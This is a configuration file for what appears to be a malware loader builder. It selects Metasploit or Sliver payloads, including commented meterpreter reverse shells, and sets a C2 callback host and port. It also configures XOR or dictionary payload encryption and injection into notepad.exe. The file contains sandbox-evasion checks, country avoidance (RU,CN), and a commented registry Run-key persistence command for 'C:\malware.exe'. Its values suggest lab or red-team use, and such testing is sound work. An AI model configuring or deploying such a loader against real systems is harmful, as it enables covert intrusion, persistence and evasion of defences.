[Payload]
# IMPLEMENTATION LATER
# framework=sliver
framework=metasploit

# Sliver payloads
# name=https

# Metasploit payloads
# Use "msfvenom -l payloads" to list all payloads
# name=windows/x64/meterpreter/reverse_https
name=windows/x64/messagebox
# name=windows/x64/meterpreter_reverse_tcp
# name=meterpreter_tcp.nasm
# name=windows/x64/exec

# Remote host and port corresponding to the C2 server to connect back to
rhost=192.168.48.132
rport=443
# ruri is used for reverse_http(s)
ruri=/furdzz

# cmd="reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MaliciousKey /t REG_SZ /d C:\malware.exe /f"
cmd=

# xor, dictionary (not yet aes)
# encryption_method=xor
encryption_method=dictionary

# XOR key, if encryption_method=xor
# random -> between 0x1111 and 0xffff with certain entropy
# encryption_key=random
encryption_key=0x5d9b
# encryption_key=random


target_process=notepad.exe

[Anti-Analysis]
# If cpu cores is less or equal than <value>, the payload will not be executed
# If not set, check will no be made
cpu_cores=0

# If ram size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in MB
ram_size=200
# If disk size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in GB
disk_size=20

# target_hostname has priority over avoid_hostname
target_hostname=
# target_hostname=CYCORP-
# target_hostname=prefix1

# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=

# based on : keyboard layout, language, timezone (IP todo)
# if one match, the payload will not be executed
# avoid_countries=RU,CN
avoid_countries=RU,CN

[Stub]
# default, a bit useless
filename=loader.c

# true = -nostdlib & no icon
# default false
priorize_size=false

# output file name
output_file=size_false.exe
